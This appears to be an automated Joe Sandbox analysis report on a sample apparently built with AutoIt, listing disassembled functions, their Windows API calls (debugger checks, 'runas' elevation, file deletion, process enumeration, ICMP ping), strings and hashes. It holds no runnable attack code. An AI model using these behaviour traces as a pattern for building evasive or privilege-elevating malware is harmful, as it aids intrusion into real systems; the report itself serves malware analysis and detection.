Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00385FF7

Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A

GetCurrentProcess.KERNEL32(?,0041DC2C,00000000,?,?), ref: 00386123
IsWow64Process.KERNEL32(00000000,?,?), ref: 0038612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00386155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00386167
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00386175
FreeLibrary.KERNEL32(00000000,?,?), ref: 0038617C
GetSystemInfo.KERNEL32(?,?,?), ref: 003861A1

Strings

kernel32.dll, xrefs: 00386150
|O, xrefs: 003C50F7
GetNativeSystemInfo, xrefs: 00386161

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 6da6f49b1a663a08929f7a99a1ae840a1417fe533aad7520324f351d8eb629c9
Instruction ID: 84da6a64fd1ee95b25b2dd961f3d5c7dd534a2e932b41421331c9409eb977720
Opcode Fuzzy Hash: 6da6f49b1a663a08929f7a99a1ae840a1417fe533aad7520324f351d8eb629c9
Instruction Fuzzy Hash: BCA1812280A3D4DFC712DB787E466953F946B27342B0858BFDC41E7223D2AD8948CB2D

Function 0038338B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00383368,?), ref: 003833BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00383368,?), ref: 003833CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,00452418,00452400,?,?,?,?,?,?,00383368,?), ref: 0038343A

Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A

Part of subcall function 0038425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00383462,00452418,?,?,?,?,?,?,?,00383368,?), ref: 003842A0

SetCurrentDirectoryW.KERNEL32(?,00000001,00452418,?,?,?,?,?,?,?,00383368,?), ref: 003834BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 003C3CB0
SetCurrentDirectoryW.KERNEL32(?,00452418,?,?,?,?,?,?,?,00383368,?), ref: 003C3CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004431F4,00452418,?,?,?,?,?,?,?,00383368), ref: 003C3D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 003C3D81

Part of subcall function 003834D3: GetSysColorBrush.USER32(0000000F), ref: 003834DE
Part of subcall function 003834D3: LoadCursorW.USER32(00000000,00007F00), ref: 003834ED
Part of subcall function 003834D3: LoadIconW.USER32(00000063), ref: 00383503
Part of subcall function 003834D3: LoadIconW.USER32(000000A4), ref: 00383515
Part of subcall function 003834D3: LoadIconW.USER32(000000A2), ref: 00383527
Part of subcall function 003834D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0038353F
Part of subcall function 003834D3: RegisterClassExW.USER32(?), ref: 00383590

Part of subcall function 003835B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003835E1
Part of subcall function 003835B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00383602
Part of subcall function 003835B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00383368,?), ref: 00383616
Part of subcall function 003835B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00383368,?), ref: 0038361F

Part of subcall function 0038396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00383A3C

Strings

0$E, xrefs: 00383495
runas, xrefs: 003C3D75
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 003C3CAA
AutoIt, xrefs: 003C3CA5

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: 0$E$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-3422563918
Opcode ID: a1c8220d22afd38d16155472d78df96cc6360d107dbcee3da9a157c4f85e23e1
Instruction ID: a068ac503298f5a80a344ffad914e72aa52d66be75ae0f2bbfb8dc0b6d0e8c5a
Opcode Fuzzy Hash: a1c8220d22afd38d16155472d78df96cc6360d107dbcee3da9a157c4f85e23e1
Instruction Fuzzy Hash: A8512B701083456AD703FF60DD01EAE7BA89F96B41F00447EF8925B2A3DB748A49C716

Function 003EDC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00385851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003855D1,?,?,003C4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00385871

Part of subcall function 003EEAB0: GetFileAttributesW.KERNEL32(?,003ED840), ref: 003EEAB1

FindFirstFileW.KERNEL32(?,?), ref: 003EDCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 003EDD1B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 003EDD2C
FindClose.KERNEL32(00000000), ref: 003EDD43
FindClose.KERNEL32(00000000), ref: 003EDD4C

Strings

\*.*, xrefs: 003EDC9D

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 8828af3faac5c83beeb917325bb1ad785c1ee22e3e9c89a468d196eabbf2fa1a
Instruction ID: de0f3a3c79a50bb6f18ed5386f8afabf18e26992edd2d9d8d9b8bb0c39541b59
Opcode Fuzzy Hash: 8828af3faac5c83beeb917325bb1ad785c1ee22e3e9c89a468d196eabbf2fa1a
Instruction Fuzzy Hash: 74315E31408395ABC302FF64CC859EFB7E8AE95304F404EADF5E586191EB21DA09CB67

Function 003EDD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 003EDDAC
Process32FirstW.KERNEL32(00000000,?), ref: 003EDDBA
Process32NextW.KERNEL32(00000000,?), ref: 003EDDDA
CloseHandle.KERNEL32(00000000), ref: 003EDE87

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 2a60dad3fb42d6d62c2f1599fbf1e1710e6b55a54961803e22fa938487bc0383
Instruction ID: 7600c4e428f22fc7fb60ffc38f7cb4db2b4eb0fbccd3334220f432de29482bf5
Opcode Fuzzy Hash: 2a60dad3fb42d6d62c2f1599fbf1e1710e6b55a54961803e22fa938487bc0383
Instruction Fuzzy Hash: 77318671108341AFD312EF50CC85AAFBBE8AFD5350F044A6DF5818B1A1DB71D949CB92

Function 0039AC3E Relevance: 37.4, APIs: 1, Strings: 20, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tA, xrefs: 0039AD35
d0b, xrefs: 0039AC96, 0039AD10, 0039AEA7
d1r0,2, xrefs: 0039ACA9
d10m0, xrefs: 0039ACF0
A, xrefs: 0039AD74
`A, xrefs: 0039ADE2
A, xrefs: 0039AD8A
PA, xrefs: 0039AD3D
(E, xrefs: 0039ADC1
4A, xrefs: 0039AD45
d1b, xrefs: 0039AD55, 0039AE8E
@A, xrefs: 0039ADED
e#E, xrefs: 0039AFA9
(E, xrefs: 0039AD65
(E, xrefs: 0039AD4D
d5m0, xrefs: 0039AE75
tA, xrefs: 0039ADCC
i, xrefs: 0039B0A3
`*E, xrefs: 0039AFF9
(E, xrefs: 0039ADD7

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID:
String ID: 4A$@A$PA$`*E$`A$d0b$d10m0$d1b$d1r0,2$d5m0$e#E$i$tA$tA$(E$(E$(E$(E$A$A
API String ID: 0-1820729067
Opcode ID: 9e63c66d6774e3f2f8ddc3654e98476567198a2c4c190aa6cf947baf45a0b89f
Instruction ID: 439ede3577f032cc6cd6fd72c593a08ba38067ed6a6ad178341a101777d77212
Opcode Fuzzy Hash: 9e63c66d6774e3f2f8ddc3654e98476567198a2c4c190aa6cf947baf45a0b89f
Instruction Fuzzy Hash: 106258B16083418FC725DF14D195AAAFBE1FF89304F10896EE4898B352DB71E949CF86

Function 00383624 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00383657
RegisterClassExW.USER32(00000030), ref: 00383681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00383692
InitCommonControlsEx.COMCTL32(?), ref: 003836AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003836BF
LoadIconW.USER32(000000A9), ref: 003836D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003836E4

Strings

0+m"8, xrefs: 0038366C
+, xrefs: 00383640
AutoIt v3 GUI, xrefs: 00383673
TaskbarCreated, xrefs: 00383687
0, xrefs: 00383639

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$0+m"8$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-2796773451
Opcode ID: e09ba042d7ecec513a0d1131a0af20b16a5d75febf5600410f3a761c433410c5
Instruction ID: 56b9e1cb73a4ed291df4c90509e473e048d671d7eb46d3654387216432ac8eb2
Opcode Fuzzy Hash: e09ba042d7ecec513a0d1131a0af20b16a5d75febf5600410f3a761c433410c5
Instruction Fuzzy Hash: BD21C3F5E01318AFDB00DFA4E989BDEBBB4FB09715F10812AF511A62A0D7B585448F98

Function 0038370F Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00383709,?,?), ref: 00383777
KillTimer.USER32(?,00000001,?,?,?,?,?,00383709,?,?), ref: 003837A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003837C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00383709,?,?), ref: 003837D1
CreatePopupMenu.USER32 ref: 003837E5
PostQuitMessage.USER32(00000000), ref: 00383806

Strings

0$E, xrefs: 003C3DF7
TaskbarCreated, xrefs: 003837CC
0$E, xrefs: 003C3DA9

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: 0$E$0$E$TaskbarCreated
API String ID: 129472671-4165878218
Opcode ID: 72c3724dd272ed20b9946d52ff288e38dd51f635da0b75729073ee779e8c94e5
Instruction ID: 68f6fd2633b59d46f36626d05dc0025601b1e718a5b7d74bd11074eab4e2f997
Opcode Fuzzy Hash: 72c3724dd272ed20b9946d52ff288e38dd51f635da0b75729073ee779e8c94e5
Instruction Fuzzy Hash: 5641C4F1240344BBDB173B38CD59BA93B69E706B01F008176F90299392DAB4DF448769

Function 003C09DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003C071A: CreateFileW.KERNEL32(00000000,00000000,?,003C0A84,?,?,00000000,?,003C0A84,00000000,0000000C), ref: 003C0737

GetLastError.KERNEL32 ref: 003C0AEF
__dosmaperr.LIBCMT ref: 003C0AF6
GetFileType.KERNEL32(00000000), ref: 003C0B02
GetLastError.KERNEL32 ref: 003C0B0C
__dosmaperr.LIBCMT ref: 003C0B15
CloseHandle.KERNEL32(00000000), ref: 003C0B35
CloseHandle.KERNEL32(?), ref: 003C0C7F
GetLastError.KERNEL32 ref: 003C0CB1
__dosmaperr.LIBCMT ref: 003C0CB8

Strings

H, xrefs: 003C0C3D

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: a23c6d83598c97cb7c7833e9869039da17116db9b7240b25d475d9d017742511
Instruction ID: 37da8666ae74c6d80e0c37063ce5b64bd8eee11e8f604157f3fb551284741054
Opcode Fuzzy Hash: a23c6d83598c97cb7c7833e9869039da17116db9b7240b25d475d9d017742511
Instruction Fuzzy Hash: F5A1F432A042989FDF1EEF68D892BAD7BA0EB06324F14425DF811DF2A1D7319D12CB55

Function 003852A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00385594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,003C4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 003855B2

Part of subcall function 00385238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0038525A

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003853C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003C4BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003C4C3E
RegCloseKey.ADVAPI32(?), ref: 003C4C80
_wcslen.LIBCMT ref: 003C4CE7
_wcslen.LIBCMT ref: 003C4CF6

Strings

Include, xrefs: 003C4BF4, 003C4C35
\Include\, xrefs: 00385381
\, xrefs: 003C4CFC
Software\AutoIt v3\AutoIt, xrefs: 003853BA

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 720f435445057cdd7bf8e42c8541d24d2a3cee4471b952c77507782676798c6c
Instruction ID: 0b84945e3777f6236548afffabe79d90906fc92c1b7b2505397be92462d53ea7
Opcode Fuzzy Hash: 720f435445057cdd7bf8e42c8541d24d2a3cee4471b952c77507782676798c6c
Instruction Fuzzy Hash: C9719071504301ABC306EF65E89199ABBE8FF59781F40442EF841CB172DB71DA48CB55

Function 003834D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 003834DE
LoadCursorW.USER32(00000000,00007F00), ref: 003834ED
LoadIconW.USER32(00000063), ref: 00383503
LoadIconW.USER32(000000A4), ref: 00383515
LoadIconW.USER32(000000A2), ref: 00383527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0038353F
RegisterClassExW.USER32(?), ref: 00383590

Part of subcall function 00383624: GetSysColorBrush.USER32(0000000F), ref: 00383657
Part of subcall function 00383624: RegisterClassExW.USER32(00000030), ref: 00383681
Part of subcall function 00383624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00383692
Part of subcall function 00383624: InitCommonControlsEx.COMCTL32(?), ref: 003836AF
Part of subcall function 00383624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003836BF
Part of subcall function 00383624: LoadIconW.USER32(000000A9), ref: 003836D5
Part of subcall function 00383624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003836E4

Strings

AutoIt v3, xrefs: 0038357F
0, xrefs: 0038355F
#, xrefs: 00383566

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 6309eff3c948e8a1616791bfed6a060f6c94a3be9b22baa3d9b628d33c13c37d
Instruction ID: c728444f190fd1225ce98abf50862b1b2d2eb8fa27c104be0ccfab715aee8a9a
Opcode Fuzzy Hash: 6309eff3c948e8a1616791bfed6a060f6c94a3be9b22baa3d9b628d33c13c37d
Instruction Fuzzy Hash: 26213DB0E00314ABDB109FA5ED45A997FB4FB09B51F00403BEA04A62A1D3F985448F98

Function 00400FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00401019
inet_addr.WSOCK32(?), ref: 00401079
gethostbyname.WS2_32(?), ref: 00401085
IcmpCreateFile.IPHLPAPI ref: 00401093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00401123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00401142
IcmpCloseHandle.IPHLPAPI(?), ref: 00401216
WSACleanup.WSOCK32 ref: 0040121C

Strings

Ping, xrefs: 004010D3

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: f960a6341e6fde61643a47554dc9c6be263cc54d125c7b997355b88ed4779340
Instruction ID: 31442490fa3fd115018a2d50ec9914c25bf65898bef1db60ee9defec7ea7517c
Opcode Fuzzy Hash: f960a6341e6fde61643a47554dc9c6be263cc54d125c7b997355b88ed4779340
Instruction Fuzzy Hash: 9991CE71604201AFD724DF14C884B16BBE0EF49318F1485AAF569AF7B2C738EC46CB85

Function 0038F6D0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

t5E, xrefs: 0038FBB1
t5E, xrefs: 003D45E9
t5E, xrefs: 003D463C
t5Et5E, xrefs: 0038F97E
Variable must be of type 'Object'., xrefs: 003D48C6
t5E, xrefs: 0038F8E0

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.$t5E$t5E$t5E$t5E$t5Et5E
API String ID: 0-1084035763
Opcode ID: f0a0d9e4b7d89d1aa71cdea290f799943e77c2b8d02ed726c49a8e8aa7e16409
Instruction ID: ea7377191336e48422f0b79217b37fe0a3d3f4c25aa9fdb870f127de63765afd
Opcode Fuzzy Hash: f0a0d9e4b7d89d1aa71cdea290f799943e77c2b8d02ed726c49a8e8aa7e16409
Instruction Fuzzy Hash: D9C29B75E00205DFCB26EF68D880AADB7B1FF09310F2585AAE945AB391D375ED41CB90

Function 00390340 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1236COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 003915F2

Strings

t5E, xrefs: 003906B7
t5E, xrefs: 003D604D
t5E, xrefs: 003D5FF9
t5Et5E, xrefs: 0039075B
t5E, xrefs: 00390A6A

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Init_thread_footer
String ID: t5E$t5E$t5E$t5E$t5Et5E
API String ID: 1385522511-3529596602
Opcode ID: 1a39da5e160d521b2e8622429bb6c0d29ca6406303bd61d41959d0792f55f6c2
Instruction ID: 0e1869af1b6685fa23f71874bb07bccbc0806967371104363ca81b6e5ead3060
Opcode Fuzzy Hash: 1a39da5e160d521b2e8622429bb6c0d29ca6406303bd61d41959d0792f55f6c2
Instruction Fuzzy Hash: 4FB28975A08301CFDB2ACF18C480A2AB7E1BF99300F25495EE9969B352D771ED45CF92

Function 00382793 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0038327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 003832AF
Part of subcall function 0038327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 003832B7
Part of subcall function 0038327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003832C2
Part of subcall function 0038327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003832CD
Part of subcall function 0038327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 003832D5
Part of subcall function 0038327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 003832DD

Part of subcall function 00383205: RegisterWindowMessageW.USER32(00000004,?,00382964), ref: 0038325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00382A0A
OleInitialize.OLE32 ref: 00382A28
